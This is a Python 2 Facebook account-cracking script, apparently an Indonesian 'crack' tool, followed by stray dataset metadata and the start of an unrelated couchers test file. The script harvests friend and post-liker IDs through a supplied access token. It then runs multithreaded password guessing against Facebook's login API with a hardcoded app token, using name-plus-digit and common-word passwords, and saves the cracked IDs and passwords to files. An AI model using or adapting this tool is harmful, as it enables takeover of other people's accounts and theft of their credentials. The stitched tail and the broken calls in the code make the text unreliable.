os.system("pip2 install mechanize")
try:
import bs4
except ImportError:
os.system("pip2 install bs4")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 2020.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "[!] Exit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.06)
#########LOGO#########
logo = """
\033[1;97m ╔══════════════♧═♡■♡═♧════════════════╗
\033[1;97m Farel_Ind Gans
MedanCyberTeam\033[1;97m.
\033[1;97m Team : Ind Guard Neverdie.
\033[1;97m ╚════════════════♡═♡══════════════════╝
\033[1;97m ╔═════════════════════════════════════╗
\033[1;97m ║ Author : Farel_Ind
\033[1;97m ║ Github : https://github.com/farelind.
\033[1;97m ╚═════════════════════════════════════╝ """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m●\033[1;97m]\033[1;93m Sedang Masuk\033[1;97m "+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
cpe = []
id = []
username = []
idteman = []
idfromteman = []
######LOGIN######
def masuk():
os.system('clear')
print logo
print "\033[1;97m ╔ ╗"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;96m\033[1;97m Login Menggunakan Token Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;96m\033[1;97m Keluar"
print "\033[1;97m ╚ ╝"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
tokenz()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
toket = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m \033[1;97mToken FB? : \033[1;93m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
jalan ('\033[1;97m Jangan Lupa Follow Akun Pribadi Saya :)')
jalan ('\033[1;97m[\033[1;91m•\033[1;97m•\033[1;97m]\033[1;92m Login Berhasil')
os.system('xdg-open https://m.facebook.com/xxx.hilmanxd')
menu()
except KeyError:
print "\033[1;97m[\033[1;93m!\033[1;97m] \033[1;93mToken Salah !"
time.sleep(1.0)
masuk()
######MENU#######
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' +toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m Nama Akun Facebook Anda:\033[1;97m·\033[1;97m "+nama
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m User ID Akun Anda:\033[1;97m·\033[1;97m "+id
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m Tanggal Lahir Facebook Anda:\033[1;97m·\033[1;97m "+ a['birthday']
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;97m\033[1;97m Crack ID Indonesia"
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;97m\033[1;97m Crack ID Group"
print "\033[1;97m [\033[1;97m03\033[1;97m]\033[1;97m\033[1;97m Ambil ID"
print "\033[1;97m [\033[1;97m04\033[1;97m]\033[1;97m\033[1;97m Ikuti Saya di Facebook"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;97m\033[1;97m Logout"
print "\033[1;97m ══════════════════════════════════════════"
pilih()
######CHOOSE######
def pilih():
unikers = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if unikers =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
elif unikers =="1" or unikers =="01":
indo()
elif unikers =="2" or unikers =="02":
crack_likes()
elif unikers =="3" or unikers =="03":
dump()
elif unikers =="4" or unikers =="04":
saya()
elif unikers =="0" or unikers =="00":
os.system('clear')
jalan('Menghapus Token')
os.system('rm -rf login.txt')
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih()
########## CRACK INDONESIA #######
def indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;97m\033[1;97m Crack dari ID Publik / Teman"
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;97m\033[1;97m Crack dari File"
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;97m\033[1;97m Kembali"
print "\033[1;97m ══════════════════════════════════════════"
pilih_indo()
#### CHOOSE INDO ####
def pilih_indo():
teak = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if teak =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
idt = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] User ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Nama Akun : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] ID Publik / Teman Tidak Ada !"
raw_input("\n[ Kembali ]")
indo()
except requests.exceptions.ConnectionError:
print"[!] Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
try:
print "\033[1;97m ══════════════════════════════════════════"
idlist = raw_input('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Nama File Target : ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m[\033[1;93m!\033[1;97m] File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m[!] File tidak ada !'
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
indo()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Total ID : "+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Crack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m \033[1;41;97m TO STOP PROCESS,PRESS CTRL+Z.GOOD LUCK :) \033[0m"
print "\033[1;97m ══════════════════════════════════════════"
##### MAIN INDONESIA #####
def main(arg):
sys.stdout.write('\r{}'.format(datetime.now().strftime('\033[1;97m%H:%M:%S')));sys.stdout.flush()
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
c = json.loads(a.text)
pass1 = c['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass1 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass1 + ' • ' + c['name']
cekpoint.append(user)
else:
pass2 = c['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass2 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass2 + ' • ' + c['name']
cekpoint.append(user)
else:
pass3 = c['first_name']+'102030'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass3 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass3 + ' • ' + c['name']
cekpoint.append(user)
else:
pass4 = c['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass4 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass4 + ' • ' + c['name']
cekpoint.append(user)
else:
pass5 = c['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass5 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass5 + ' • ' + c['name']
cekpoint.append(user)
else:
pass6 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass6 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass6 + ' • ' + c['name']
cekpoint.append(user)
else:
pass7 = 'Indonesia'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass7 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass7 + ' • ' + c['name']
cekpoint.append(user)
else:
pass8 = 'Kontol'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass8 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass8 + ' • ' + c['name']
cekpoint.append(user)
else:
pass9 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
w = json.load(data)
if 'access_token' in w:
print '\033[1;92m | ' + user + ' • ' + pass9 + ' • ' + c['name']
oks.append(user)
else:
if 'www.facebook.com' in w['error_msg']:
print '\033[1;93m | ' + user + ' • ' + pass9 + ' • ' + c['name']
cekpoint.append(user)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 45* "\033[1;97m="
print '\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mSelesai Dek.....'
print"\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] \033[1;97mCP file tersimpan : out/indo1.txt'
print 45* "\033[1;97m="
raw_input("\033[1;97m[\033[1;97m Kembali \033[1;97m]")
os.system("python2 2020.py")
##### CRACK LIKES #####
def crack_likes():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
tez = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] ID Postingan Group / Teman : ")
r = requests.get("https://graph.facebook.com/"+tez+"/likes?limit=5000&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
jalan('\r\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m...')
except KeyError:
print"\033[1;97m[\033[1;93m!\033[1;97m] \033[1;97mID Postingan Salah !"
raw_input('\n\033[1;93m[ \033[1;97mKembali \033[1;93m]')
crack_likes()
print "\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Total ID : "+str(len(id))
print('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] Stop CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m[\033[1;93m•\033[1;97m] Crack Berjalan Dek "+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;97m=========================================="
##### MAIN LIKES #####
def main(arg):
sys.stdout.write('\r{}'.format(datetime.now().strftime('\033[1;97m%H:%M:%S')));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos1 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos1 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos2 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos2 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos3 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos3 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = j['first_name']+'321'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos4 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos4 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = j['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos5 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos5 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = 'Anjing'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print '\033[1;92m | ' + zowe + ' | ' + bos6 + ' | ' + j['name']
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print '\033[1;93m | ' + zowe + ' | ' + bos6 + ' | ' + j['name']
cek = open("done/grup.txt", "a")
cek.write("ID:" +zowe+ " PW:" +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print 45* "\033[1;97m="
print '\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mSelesai ....'
print"\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mCP file tersimpan : done/grup.txt'
print 45* "\033[1;97m="
raw_input("\033[1;97m[\033[1;97m Kembali \033[1;97m]")
os.system("python2 UNIS3X.py")
######### DUMP ##########
def dump():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
menu()
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
print "\033[1;97m [\033[1;97m01\033[1;97m]\033[1;93m\033[1;97m Ambil ID dari Daftar Teman "
print "\033[1;97m [\033[1;97m02\033[1;97m]\033[1;93m\033[1;97m Ambil ID dari Publik / Teman "
print "\033[1;97m [\033[1;91m00\033[1;97m]\033[1;93m\033[1;97m Kembali "
print "\033[1;97m ══════════════════════════════════════════"
dump_pilih()
def dump_pilih():
cuih = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m]\033[1;97m ")
if cuih =="":
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
dump_pilih()
elif cuih =="1" or cuih =="01":
id_teman()
elif cuih =="2" or cuih =="02":
idfrom_teman()
elif cuih =="0" or cuih =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
dump_pilih()
##### FRIEND IDS #####
def id_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print 45* "\033[1;97m="
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mMengambil semua ID Teman \033[1;97m...')
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[\033[1;93m"+str(len(idteman))+"\033[1;97m]\033[1;97m =>"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;97m'+a['id']
bz.close()
print '\r\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;93m•\033[1;97m] \033[1;97mTotal ID : %s"%(len(idteman))
done = raw_input("\r\033[1;97m[\033[1;93m?\033[1;97m] \033[1;97mSimpan Nama File : ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;97m[\033[1;95m+\033[1;97m] \033[1;97mFile tersimpan : \033[1;97mout/"+done)
print "\033[1;92m~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
raw_input("\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 UNIS3X.py")
except IOError:
print"\033[1;91m[!] Gagal membuat file"
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti !")
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except KeyError:
print('\033[1;91m[!] Gagal !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print('\033[1;97m[\033[1;95m!\033[1;97m]\033[1;97m File anda tidak tersimpan !')
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 2020.py")
except requests.exceptions.ConnectionError:
print"\033[1;97m[×] Tidak ada koneksi !"
keluar()
##### PUBLIC IDS #####
def idfrom_teman():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('clear')
print logo
print "\033[1;97m ══════════════════════════════════════════"
idt = raw_input("\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] User ID Target : ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mNama Akun : "+op["name"]
except KeyError:
print"\033[1;97m[\033[1;91m•\033[1;93m•\033[1;92m•\033[1;97m] ID Publik Tidak Ada !"
raw_input("\n\033[1;97m[\033[1;97m Kembali \033[1;97m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(50000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;97m [\033[1;91m•\033[1;97m•\033[1;97m] \033[1;97mMengambil Semua ID ...')
print "\033[1;97m ══════════════════════════════════════════"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m [ \033[1;97m"+str(len(idfromteman))+"\033[1;97m ]\033[1;91m •\033[1;97m•\033[1;97m"),;sys.stdout.flush();time.sleep(0.0050)
print '\033[1;97m ' + a['id']
bz.close()
print '\r\033[1;97m[\033[1;93m✓\033[1;97m] \033[1;97mSukses Mengambil ID \033[1;97m....'
print"\r\033[1;97m[\033[1;93m•\033[1;97m] Total ID : %s"%(len(idfromteman))
done = raw_input("\r\033[1;97m[\033[1;93m+\033[1;97m] \033[1;97mSimpan Nama File : ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[\033[1;95m√\033[1;97m] File tersimpan : out/"+done)
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
dump()
except OSError:
print"\033[1;97m[!] File Tidak Tersimpan "
raw_input("\n\033[1;93m[ \033[1;97mKembali \033[1;93m]")
os.system("python2 2020.py")
except IOError:
print"\033[1;97m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
os.system("python2 2020.py")
except (KeyboardInterrupt,EOFError):
print("\033[1;97m[!] Terhenti")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;97m[\033[1;95m!\033[1;97m] Teman tidak ada !')
raw_input("\n\033[1;93m[\033[1;97m Kembali \033[1;93m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;97m[\033[1;91m✖\033[1;97m] Tidak ada koneksi !"
keluar()
#######ME########
def saya():
os.system ('clear')
print logo
jalan (' \033[92mAnda Akan Di Arahkan Ke Browser')
os.system('xdg-open https://m.facebook.com/cindy.adelia.330')
menu()
if __name__=='__main__':
menu()
masuk()
| 40.947293
| 305
| 0.582049
| 4,379
| 28,745
| 3.971683
| 0.088605
| 0.105336
| 0.108268
| 0.077622
| 0.819917
| 0.798701
| 0.758395
| 0.724816
| 0.701414
| 0.673011
| 0
| 0.167207
| 0.184623
| 28,745
| 701
| 306
| 41.005706
| 0.538229
| 0.006053
| 0
| 0.580247
| 0
| 0.151235
| 0.50641
| 0.191801
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.075617
| 0.016975
| null | null | 0.212963
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 8
| fe2447d03cbbe79e3c04ee355734e96140b0a61c
| 24,052
| py
| Python
| app/backend/src/tests/test_auth.py
| anand-prem/couchers
| ee4e93aacc6331cc22bb496749ca79c2c6474976
| ["MIT"]
| null | null | null
| app/backend/src/tests/test_auth.py
| anand-prem/couchers
| ee4e93aacc6331cc22bb496749ca79c2c6474976
| ["MIT"]
| null | null | null
| app/backend/src/tests/test_auth.py
| anand-prem/couchers
| ee4e93aacc6331cc22bb496749ca79c2c6474976
| ["MIT"]
| null | null | null
|
import http.cookies
import grpc
import pytest
from google.protobuf import empty_pb2
from couchers import errors
from couchers.crypto import hash_password, random_hex
from couchers.db import session_scope
from couchers.models import LoginToken, PasswordResetToken, SignupToken, User, UserSession
from pb import api_pb2, auth_pb2
from tests.test_fixtures import auth_api_session, db, fast_passwords, generate_user, real_api_session, testconfig
@pytest.fixture(autouse=True)
def _(testconfig):
pass
def get_session_cookie_token(metadata_interceptor):
return http.cookies.SimpleCookie(metadata_interceptor.latest_headers["set-cookie"])["couchers-sesh"].value
def test_UsernameValid(db):
